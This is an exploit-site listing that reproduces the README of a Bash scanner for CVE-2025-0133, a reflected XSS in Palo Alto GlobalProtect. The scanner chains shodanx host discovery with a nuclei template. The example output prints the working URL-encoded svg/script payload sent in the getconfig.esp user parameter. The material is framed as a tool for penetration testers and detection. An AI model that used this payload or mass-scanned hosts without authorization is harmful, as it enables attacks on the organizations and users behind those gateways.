Exploit for CVE-2025-0133

Name: Exploit for CVE-2025-0133
Rating: 5 (87 reviews)
2025-06-24 | CVSS 6.9
## https://sploitus.com/exploit?id=0D5ECC1D-0D60-57F8-A35C-6A97574D1805
# CVE-2025-0133 Vulnerability Scanner

A Bash-based automated scanner tool for detecting the **CVE-2025-0133** Reflected XSS vulnerability in **Palo Alto GlobalProtect Gateway & Portal** using `nuclei` and `shodanx`.

---

**Author**:  
<p align="center">
  <a href="https://github.com/INTELEON404">
    <img title="Github" src="https://img.shields.io/badge/INTELEON404-red?style=for-the-badge&logo=github">
  </a>
</p>

**Date**: 2025-06-23  
**Severity**: Medium  
**CVE ID**: CVE-2025-0133  
**Vulnerability Type**: Reflected Cross-Site Scripting (XSS)  
**Tested Against**: Palo Alto Networks GlobalProtect Portal (PAN-OS)  

---

## Overview

This tool helps penetration testers and security researchers quickly identify vulnerable domains or IPs related to the CVE-2025-0133 issue.  
It leverages `nuclei` templates and Shodan query integration (`shodanx`) to find and scan targets efficiently.

---

## Features

- Automatically detects if input is a single domain or a file containing multiple domains/IPs  
- Runs `shodanx` on single domains to gather related hosts  
- Uses `nuclei` with a custom CVE-2025-0133 template to scan targets  
- Displays scan results in a clean tabular format on the command line  
- Shows scan start and end times  
- Prompts to save results in both `.txt` and `.json` formats  
- Built-in help and usage instructions

---

## Requirements

- Linux environment with Bash shell  
- [nuclei](https://nuclei.projectdiscovery.io/) installed and accessible in `$PATH`  
- [shodanx](https://github.com/RevoltSecurities/ShodanX)) installed and configured  
- The `CVE-2025-0133` nuclei template file located at:  
  `/home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml` (update path as needed)
  
## 📦 Required Tools Installation

### 🔹 1. Install [ShodanX](https://github.com/RevoltSecurities/ShodanX)

```bash
pip install git+https://github.com/RevoltSecurities/ShodanX 
```
>**If the error shows**: "error: externally-managed-environment"
```bash
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages
````
> ⚠️ **Note:**
> `--break-system-packages` option is needed on some systems (especially Debian/Ubuntu) to allow pip to install packages outside a virtual environment without permission errors.

👉 Make sure `shodanx` is available in your `$PATH`.
You can test it with:

```bash
shodanx -h
```

### 🔹 2. Install [Nuclei](https://github.com/projectdiscovery/nuclei)

```bash
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
```

Check if installed:

```bash
nuclei -version
```

Then update the templates:

```bash
nuclei -update-templates
```

---

## Usage

```bash
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h 
Usage: ./cve20250133.sh <domain-or-file>

Scan CVE-2025-0133 vulnerabilities using nuclei and shodanx.
If input is a file, scan domains/IPs from the file.
If input is a domain, run shodanx to find related IPs/domains and scan them.

Options:
  -h, --help, help     Show this help message and exit.

````

---

## Examples

### Scan a single domain

```bash
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Scan Start Time: 2025-06-24 16:33:51


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-ＩＮＴＥＬＥＯＮ４０４


[✔] Input is a single domain: domain.com — Running ShodanX first
     _                               _      
    | |            |                (_\  /  
 ,  | |     __   __|   __,   _  _      \/   
/ \_|/ \   /  \_/  |  /  |  / |/ |     /\   
 \/ |   |_/\__/ \_/|_/\_/|_/  |  |_/ _/  \_/
                                            
                                            

                     - RevoltSecurities

[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
```

### Scan from a file

```bash
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt       
Scan Start Time: 2025-06-24 16:36:37


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-ＩＮＴＥＬＥＯＮ４０４


[✔] Input is a file: file.txt — Skipping ShodanX
[*] Scanning domain 123.45.67.890 ...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
```

---

## CVE-2025-0133 Details

Reflected Cross-Site Scripting (XSS) vulnerability in Palo Alto GlobalProtect Gateway & Portal allowing attackers to inject malicious scripts via crafted requests.
Patch your systems by updating to the latest Palo Alto Networks releases to mitigate this issue.

---

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.